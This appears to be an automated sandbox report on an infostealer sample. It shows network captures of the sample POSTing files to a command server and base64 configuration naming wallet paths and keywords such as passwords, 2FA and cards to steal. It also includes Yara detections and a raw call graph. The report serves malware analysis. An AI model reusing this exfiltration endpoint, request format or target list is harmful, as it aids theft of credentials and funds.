                                                                                                    Content-Length: 2408
                                                                                                    Connection: close
                                                                                                    Vary: Accept-Encoding
                                                                                                    X-Served-By: shaffatta.com
                                                                                                    2024-05-03 09:21:47 UTC2408INData Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d
                                                                                                    Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXM


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.4 | 49754 | 168.119.248.46 | 443 | 6936 | C:\Users\user\Desktop\pYJeC4VJbw.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-03 09:21:48 UTC | 200 | OUT | POST /fdca69ae739b4897.php HTTP/1.1
                                                                                                    Content-Type: multipart/form-data; boundary=----DHJDAKEGDBFHCAAKJJJD
                                                                                                    Host: shaffatta.com
                                                                                                    Content-Length: 265
                                                                                                    Connection: Keep-Alive
                                                                                                    Cache-Control: no-cache
                                                                                                    2024-05-03 09:21:48 UTC265OUTData Raw: 2d 2d 2d 2d 2d 2d 44 48 4a 44 41 4b 45 47 44 42 46 48 43 41 41 4b 4a 4a 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 37 37 65 31 61 62 62 34 37 33 30 61 30 63 33 62 31 66 34 32 63 63 61 62 36 37 64 37 61 32 61 65 30 36 31 64 64 66 32 34 37 34 38 37 62 33 39 35 65 32 33 32 37 32 38 35 39 33 31 64 37 64 31 30 38 30 64 34 33 30 36 0d 0a 2d 2d 2d 2d 2d 2d 44 48 4a 44 41 4b 45 47 44 42 46 48 43 41 41 4b 4a 4a 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 44 48 4a 44 41 4b 45 47 44 42 46 48 43 41
                                                                                                    Data Ascii: ------DHJDAKEGDBFHCAAKJJJDContent-Disposition: form-data; name="token"877e1abb4730a0c3b1f42ccab67d7a2ae061ddf247487b395e2327285931d7d1080d4306------DHJDAKEGDBFHCAAKJJJDContent-Disposition: form-data; name="message"files------DHJDAKEGDBFHCA
2024-05-03 09:21:48 UTC | 206 | IN | HTTP/1.1 200 OK
                                                                                                    Server: openresty
                                                                                                    Date: Fri, 03 May 2024 09:21:48 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 908
                                                                                                    Connection: close
                                                                                                    Vary: Accept-Encoding
                                                                                                    X-Served-By: shaffatta.com
                                                                                                    2024-05-03 09:21:48 UTC908INData Raw: 5a 47 56 7a 61 33 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 6a 62 32 52 6c 63 79 6f 73 4b 6a 4a 6d 59 53 6f 73 4b 6d 6c 69 59 57 34 71 4c 43 70 6a 59 58 4a 6b 63 79 6f 73 4b 6d 4a 68 62 6d 74 7a 4b 69 77 71 59 33 5a 32 4b 69 77 71 59 33 5a 6a 4b 69 77 71 59 57 4e 6a 62 33 56 75 64 43 6f 73 4b 6d 4e 79 5a 57 52 6c 62 6e 52 70 59 57 78 7a 4b 69 77 71 59 6d 6c 30 59 32 39 70 62 69 6f 73 4b 6d 56 30 61 47 56 79 5a 58 56 74 4b 69 77 71 59 6d 46 75 61 79 6f 73 4b 6e 42 68 63 33 4e 33 62 33 4a 6b 4b 69 77 71 64 32 46 73 62 47 56 30 4b 69 77 71 4c 6e 52 34 64 43 77 71 4c 6d 52 76 59 79 77 71 63 32 56 6a 63 6d 56 30 4b 69 77 71 4c 6e 4a 30 5a 69 77 67 4b 69 35 6b 62 32 4e 34 4c 43 6f 75 65 47 78 7a 65 43 77 71 4c 6e 68 73 63 79 6f 73 4b 69 35 30 65 48 51
                                                                                                    Data Ascii: ZGVza3wlREVTS1RPUCVcfCpjb2RlcyosKjJmYSosKmliYW4qLCpjYXJkcyosKmJhbmtzKiwqY3Z2KiwqY3ZjKiwqYWNjb3VudCosKmNyZWRlbnRpYWxzKiwqYml0Y29pbiosKmV0aGVyZXVtKiwqYmFuayosKnBhc3N3b3JkKiwqd2FsbGV0KiwqLnR4dCwqLmRvYywqc2VjcmV0KiwqLnJ0ZiwgKi5kb2N4LCoueGxzeCwqLnhscyosKi50eHQ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.4 | 49755 | 168.119.248.46 | 443 | 6936 | C:\Users\user\Desktop\pYJeC4VJbw.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-03 09:21:49 UTC | 201 | OUT | POST /fdca69ae739b4897.php HTTP/1.1
                                                                                                    Content-Type: multipart/form-data; boundary=----AFHIEBKKFHIEGCAKECGH
                                                                                                    Host: shaffatta.com
                                                                                                    Content-Length: 1759
                                                                                                    Connection: Keep-Alive
                                                                                                    Cache-Control: no-cache
                                                                                                    2024-05-03 09:21:49 UTC1759OUTData Raw: 2d 2d 2d 2d 2d 2d 41 46 48 49 45 42 4b 4b 46 48 49 45 47 43 41 4b 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 37 37 65 31 61 62 62 34 37 33 30 61 30 63 33 62 31 66 34 32 63 63 61 62 36 37 64 37 61 32 61 65 30 36 31 64 64 66 32 34 37 34 38 37 62 33 39 35 65 32 33 32 37 32 38 35 39 33 31 64 37 64 31 30 38 30 64 34 33 30 36 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 49 45 42 4b 4b 46 48 49 45 47 43 41 4b 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 6d 6c 73 5a 58 4e 63 5a 47 56 7a 61 31 78 42 53 56 68 42 51 31 5a 5a 51
                                                                                                    Data Ascii: ------AFHIEBKKFHIEGCAKECGHContent-Disposition: form-data; name="token"877e1abb4730a0c3b1f42ccab67d7a2ae061ddf247487b395e2327285931d7d1080d4306------AFHIEBKKFHIEGCAKECGHContent-Disposition: form-data; name="file_name"ZmlsZXNcZGVza1xBSVhBQ1ZZQ
2024-05-03 09:21:49 UTC | 181 | IN | HTTP/1.1 200 OK
                                                                                                    Server: openresty
                                                                                                    Date: Fri, 03 May 2024 09:21:49 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 0
                                                                                                    Connection: close
                                                                                                    X-Served-By: shaffatta.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.4 | 49756 | 168.119.248.46 | 443 | 6936 | C:\Users\user\Desktop\pYJeC4VJbw.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-03 09:21:49 UTC | 201 | OUT | POST /fdca69ae739b4897.php HTTP/1.1
                                                                                                    Content-Type: multipart/form-data; boundary=----KKKEBKJJDGHCBGCAAKEH
                                                                                                    Host: shaffatta.com
                                                                                                    Content-Length: 1743
                                                                                                    Connection: Keep-Alive
                                                                                                    Cache-Control: no-cache
                                                                                                    2024-05-03 09:21:49 UTC1743OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4b 45 42 4b 4a 4a 44 47 48 43 42 47 43 41 41 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 37 37 65 31 61 62 62 34 37 33 30 61 30 63 33 62 31 66 34 32 63 63 61 62 36 37 64 37 61 32 61 65 30 36 31 64 64 66 32 34 37 34 38 37 62 33 39 35 65 32 33 32 37 32 38 35 39 33 31 64 37 64 31 30 38 30 64 34 33 30 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 45 42 4b 4a 4a 44 47 48 43 42 47 43 41 41 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 6d 6c 73 5a 58 4e 63 5a 47 56 7a 61 31 78 42 53 56 68 42 51 31 5a 5a 51
                                                                                                    Data Ascii: ------KKKEBKJJDGHCBGCAAKEHContent-Disposition: form-data; name="token"877e1abb4730a0c3b1f42ccab67d7a2ae061ddf247487b395e2327285931d7d1080d4306------KKKEBKJJDGHCBGCAAKEHContent-Disposition: form-data; name="file_name"ZmlsZXNcZGVza1xBSVhBQ1ZZQ
2024-05-03 09:21:50 UTC | 181 | IN | HTTP/1.1 200 OK
                                                                                                    Server: openresty
                                                                                                    Date: Fri, 03 May 2024 09:21:50 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 0
                                                                                                    Connection: close
                                                                                                    X-Served-By: shaffatta.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.4 | 49757 | 168.119.248.46 | 443 | 6936 | C:\Users\user\Desktop\pYJeC4VJbw.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-03 09:21:52 UTC | 201 | OUT | POST /fdca69ae739b4897.php HTTP/1.1
                                                                                                    Content-Type: multipart/form-data; boundary=----AFHIEBKKFHIEGCAKECGH
                                                                                                    Host: shaffatta.com
                                                                                                    Content-Length: 1759
                                                                                                    Connection: Keep-Alive
                                                                                                    Cache-Control: no-cache
                                                                                                    2024-05-03 09:21:52 UTC1759OUTData Raw: 2d 2d 2d 2d 2d 2d 41 46 48 49 45 42 4b 4b 46 48 49 45 47 43 41 4b 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 37 37 65 31 61 62 62 34 37 33 30 61 30 63 33 62 31 66 34 32 63 63 61 62 36 37 64 37 61 32 61 65 30 36 31 64 64 66 32 34 37 34 38 37 62 33 39 35 65 32 33 32 37 32 38 35 39 33 31 64 37 64 31 30 38 30 64 34 33 30 36 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 49 45 42 4b 4b 46 48 49 45 47 43 41 4b 45 43 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 6d 6c 73 5a 58 4e 63 5a 47 56 7a 61 31 78 45 56 45 4a 61 52 30 6c 50 54
                                                                                                    Data Ascii: ------AFHIEBKKFHIEGCAKECGHContent-Disposition: form-data; name="token"877e1abb4730a0c3b1f42ccab67d7a2ae061ddf247487b395e2327285931d7d1080d4306------AFHIEBKKFHIEGCAKECGHContent-Disposition: form-data; name="file_name"ZmlsZXNcZGVza1xEVEJaR0lPT
2024-05-03 09:21:52 UTC | 181 | IN | HTTP/1.1 200 OK
                                                                                                    Server: openresty
                                                                                                    Date: Fri, 03 May 2024 09:21:52 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 0
                                                                                                    Connection: close
                                                                                                    X-Served-By: shaffatta.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.4 | 49758 | 168.119.248.46 | 443 | 6936 | C:\Users\user\Desktop\pYJeC4VJbw.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-03 09:21:52 UTC | 201 | OUT | POST /fdca69ae739b4897.php HTTP/1.1
                                                                                                    Content-Type: multipart/form-data; boundary=----JKFIDGDHJEGIEBFHDGDG
                                                                                                    Host: shaffatta.com
                                                                                                    Content-Length: 1743
                                                                                                    Connection: Keep-Alive
                                                                                                    Cache-Control: no-cache
                                                                                                    2024-05-03 09:21:52 UTC1743OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 46 49 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 37 37 65 31 61 62 62 34 37 33 30 61 30 63 33 62 31 66 34 32 63 63 61 62 36 37 64 37 61 32 61 65 30 36 31 64 64 66 32 34 37 34 38 37 62 33 39 35 65 32 33 32 37 32 38 35 39 33 31 64 37 64 31 30 38 30 64 34 33 30 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 46 49 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 6d 6c 73 5a 58 4e 63 5a 47 56 7a 61 31 78 45 56 45 4a 61 52 30 6c 50 54
                                                                                                    Data Ascii: ------JKFIDGDHJEGIEBFHDGDGContent-Disposition: form-data; name="token"877e1abb4730a0c3b1f42ccab67d7a2ae061ddf247487b395e2327285931d7d1080d4306------JKFIDGDHJEGIEBFHDGDGContent-Disposition: form-data; name="file_name"ZmlsZXNcZGVza1xEVEJaR0lPT
                                                                                                    2024-05-03 09:21:53 UTC181INHTTP/1.1 200 OK
                                                                                                    Server: openresty
                                                                                                    Date: Fri, 03 May 2024 09:21:53 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Content-Length: 0
                                                                                                    Connection: close
                                                                                                    X-Served-By: shaffatta.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.4 | 49759 | 168.119.248.46 | 443 | 6936 | C:\Users\user\Desktop\pYJeC4VJbw.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-03 09:21:53 UTC | 201 | OUT | POST /fdca69ae739b4897.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----ECGDBAEHIJKKFHIEGCBG
Host: shaffatta.com
Content-Length: 1759
Connection: Keep-Alive
Cache-Control: no-cache
2024-05-03 09:21:53 UTC | 1759 | OUT | Data Ascii: ------ECGDBAEHIJKKFHIEGCBGContent-Disposition: form-data; name="token"877e1abb4730a0c3b1f42ccab67d7a2ae061ddf247487b395e2327285931d7d1080d4306------ECGDBAEHIJKKFHIEGCBGContent-Disposition: form-data; name="file_name"ZmlsZXNcZGVza1xOSFBLSVpVV
2024-05-03 09:21:54 UTC | 181 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Fri, 03 May 2024 09:21:54 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
X-Served-By: shaffatta.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.4 | 49760 | 168.119.248.46 | 443 | 6936 | C:\Users\user\Desktop\pYJeC4VJbw.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-03 09:21:54 UTC | 201 | OUT | POST /fdca69ae739b4897.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----ECBAEBGHDAECBGDGCAKE
Host: shaffatta.com
Content-Length: 1743
Connection: Keep-Alive
Cache-Control: no-cache
2024-05-03 09:21:54 UTC | 1743 | OUT | Data Ascii: ------ECBAEBGHDAECBGDGCAKEContent-Disposition: form-data; name="token"877e1abb4730a0c3b1f42ccab67d7a2ae061ddf247487b395e2327285931d7d1080d4306------ECBAEBGHDAECBGDGCAKEContent-Disposition: form-data; name="file_name"ZmlsZXNcZGVza1xOSFBLSVpVV
2024-05-03 09:21:55 UTC | 181 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Fri, 03 May 2024 09:21:55 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
X-Served-By: shaffatta.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.4 | 49761 | 168.119.248.46 | 443 | 6936 | C:\Users\user\Desktop\pYJeC4VJbw.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-03 09:21:55 UTC | 201 | OUT | POST /fdca69ae739b4897.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----JJEGCBGIDHCAKEBGIIDB
Host: shaffatta.com
Content-Length: 1759
Connection: Keep-Alive
Cache-Control: no-cache
2024-05-03 09:21:55 UTC | 1759 | OUT | Data Ascii: ------JJEGCBGIDHCAKEBGIIDBContent-Disposition: form-data; name="token"877e1abb4730a0c3b1f42ccab67d7a2ae061ddf247487b395e2327285931d7d1080d4306------JJEGCBGIDHCAKEBGIIDBContent-Disposition: form-data; name="file_name"ZmlsZXNcZGVza1xYWlhIQVZHU
2024-05-03 09:21:55 UTC | 181 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Fri, 03 May 2024 09:21:55 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
X-Served-By: shaffatta.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.4 | 49762 | 168.119.248.46 | 443 | 6936 | C:\Users\user\Desktop\pYJeC4VJbw.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-03 09:21:56 UTC | 201 | OUT | POST /fdca69ae739b4897.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----JJKFBAKFBGDHIEBGDAKF
Host: shaffatta.com
Content-Length: 1743
Connection: Keep-Alive
Cache-Control: no-cache
2024-05-03 09:21:56 UTC | 1743 | OUT | Data Ascii: ------JJKFBAKFBGDHIEBGDAKFContent-Disposition: form-data; name="token"877e1abb4730a0c3b1f42ccab67d7a2ae061ddf247487b395e2327285931d7d1080d4306------JJKFBAKFBGDHIEBGDAKFContent-Disposition: form-data; name="file_name"ZmlsZXNcZGVza1xYWlhIQVZHU
2024-05-03 09:21:56 UTC | 181 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Fri, 03 May 2024 09:21:56 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
X-Served-By: shaffatta.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.4 | 49763 | 168.119.248.46 | 443 | 6936 | C:\Users\user\Desktop\pYJeC4VJbw.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-03 09:21:57 UTC | 201 | OUT | POST /fdca69ae739b4897.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----HIIIDAKKJJJKKECAKKJE
Host: shaffatta.com
Content-Length: 1759
Connection: Keep-Alive
Cache-Control: no-cache
2024-05-03 09:21:57 UTC | 1759 | OUT | Data Ascii: ------HIIIDAKKJJJKKECAKKJEContent-Disposition: form-data; name="token"877e1abb4730a0c3b1f42ccab67d7a2ae061ddf247487b395e2327285931d7d1080d4306------HIIIDAKKJJJKKECAKKJEContent-Disposition: form-data; name="file_name"ZmlsZXNcZGVza1xBSVhBQ1ZZQ
2024-05-03 09:21:57 UTC | 181 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Fri, 03 May 2024 09:21:57 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
X-Served-By: shaffatta.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.4 | 49764 | 168.119.248.46 | 443 | 6936 | C:\Users\user\Desktop\pYJeC4VJbw.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-03 09:21:59 UTC | 201 | OUT | POST /fdca69ae739b4897.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----IJKJJKFHIJKKFHJJECBA
Host: shaffatta.com
Content-Length: 1743
Connection: Keep-Alive
Cache-Control: no-cache
2024-05-03 09:21:59 UTC | 1743 | OUT | Data Ascii: ------IJKJJKFHIJKKFHJJECBAContent-Disposition: form-data; name="token"877e1abb4730a0c3b1f42ccab67d7a2ae061ddf247487b395e2327285931d7d1080d4306------IJKJJKFHIJKKFHJJECBAContent-Disposition: form-data; name="file_name"ZmlsZXNcZGVza1xBSVhBQ1ZZQ
2024-05-03 09:22:00 UTC | 181 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Fri, 03 May 2024 09:22:00 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
X-Served-By: shaffatta.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.4 | 49765 | 168.119.248.46 | 443 | 6936 | C:\Users\user\Desktop\pYJeC4VJbw.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-03 09:22:00 UTC | 201 | OUT | POST /fdca69ae739b4897.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----CFHCGHJDBFIIDGDHIJDB
Host: shaffatta.com
Content-Length: 1759
Connection: Keep-Alive
Cache-Control: no-cache
2024-05-03 09:22:00 UTC | 1759 | OUT | Data Ascii: ------CFHCGHJDBFIIDGDHIJDBContent-Disposition: form-data; name="token"877e1abb4730a0c3b1f42ccab67d7a2ae061ddf247487b395e2327285931d7d1080d4306------CFHCGHJDBFIIDGDHIJDBContent-Disposition: form-data; name="file_name"ZmlsZXNcZGVza1xEVEJaR0lPT
2024-05-03 09:22:01 UTC | 181 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Fri, 03 May 2024 09:22:01 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
X-Served-By: shaffatta.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.4 | 49766 | 168.119.248.46 | 443 | 6936 | C:\Users\user\Desktop\pYJeC4VJbw.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-03 09:22:01 UTC | 201 | OUT | POST /fdca69ae739b4897.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----DBFIEHDHIIIECAAKECFH
Host: shaffatta.com
Content-Length: 1743
Connection: Keep-Alive
Cache-Control: no-cache
2024-05-03 09:22:01 UTC | 1743 | OUT | Data Ascii: ------DBFIEHDHIIIECAAKECFHContent-Disposition: form-data; name="token"877e1abb4730a0c3b1f42ccab67d7a2ae061ddf247487b395e2327285931d7d1080d4306------DBFIEHDHIIIECAAKECFHContent-Disposition: form-data; name="file_name"ZmlsZXNcZGVza1xLQVRBWFpWQ
2024-05-03 09:22:02 UTC | 181 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Fri, 03 May 2024 09:22:01 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
X-Served-By: shaffatta.com


Target ID: 0
Start time: 11:19:53
Start date: 03/05/2024
Path: C:\Users\user\Desktop\pYJeC4VJbw.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\pYJeC4VJbw.exe"
Imagebase: 0x400000
File size: 358'400 bytes
MD5 hash: 14C3DB1BDBA407C23F0E80BBFDD6DB0F
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
                                                                                                    • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.2884642591.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000000.00000002.2884642591.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2884642591.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2884797147.0000000002D97000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2884177155.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                    • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000003.2489810753.0000000002CC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000000.00000003.2489810753.0000000002CC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2884841467.0000000002DC0000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                    • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2884861560.0000000002DD5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    Reputation:low
                                                                                                    Has exited:false

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:3.7%
                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                      Signature Coverage:4.2%
                                                                                                      Total number of Nodes:2000
                                                                                                      Total number of Limit Nodes:40
75815->75828 75816->75812 75818 404669 75817->75818 75819 416ea0 lstrcpy 75818->75819 75820 404672 75819->75820 75821 416fb0 4 API calls 75820->75821 75822 404691 75821->75822 75823 416ea0 lstrcpy 75822->75823 75824 40469a 75823->75824 75825 416f20 3 API calls 75824->75825 75826 4046b8 75825->75826 75827 416ea0 lstrcpy 75826->75827 75829 4046c1 75827->75829 75828->74978 75830 416fb0 4 API calls 75829->75830 75831 4046e0 75830->75831 75832 416ea0 lstrcpy 75831->75832 75833 4046e9 75832->75833 75834 416fb0 4 API calls 75833->75834 75835 404708 75834->75835 75836 416ea0 lstrcpy 75835->75836 75837 404711 75836->75837 75838 416fb0 4 API calls 75837->75838 75839 40473d 75838->75839 75840 416f20 3 API calls 75839->75840 75841 404744 75840->75841 75842 416ea0 lstrcpy 75841->75842 75843 40474d 75842->75843 75844 404763 InternetConnectA 75843->75844 75844->75800 75845 404793 HttpOpenRequestA 75844->75845 75847 4047e8 75845->75847 75848 404b7e InternetCloseHandle 75845->75848 75849 416fb0 4 API calls 75847->75849 75848->75800 75850 4047fc 75849->75850 75851 416ea0 lstrcpy 75850->75851 75852 404805 75851->75852 75853 416f20 3 API calls 75852->75853 75854 404823 75853->75854 75855 416ea0 lstrcpy 75854->75855 75856 40482c 75855->75856 75857 416fb0 4 API calls 75856->75857 75858 40484b 75857->75858 75859 416ea0 lstrcpy 75858->75859 75860 404854 75859->75860 75861 416fb0 4 API calls 75860->75861 75862 404875 75861->75862 75863 416ea0 lstrcpy 75862->75863 75864 40487e 75863->75864 75865 416fb0 4 API calls 75864->75865 75866 40489e 75865->75866 75867 416ea0 lstrcpy 75866->75867 75868 4048a7 75867->75868 75869 416fb0 4 API calls 75868->75869 75870 4048c6 75869->75870 75871 416ea0 lstrcpy 75870->75871 75872 4048cf 75871->75872 75873 416f20 3 API calls 75872->75873 75874 4048ed 75873->75874 75875 416ea0 lstrcpy 75874->75875 75876 4048f6 75875->75876 75877 416fb0 4 API calls 75876->75877 75878 404915 75877->75878 75879 416ea0 lstrcpy 75878->75879 75880 40491e 75879->75880 75881 416fb0 4 
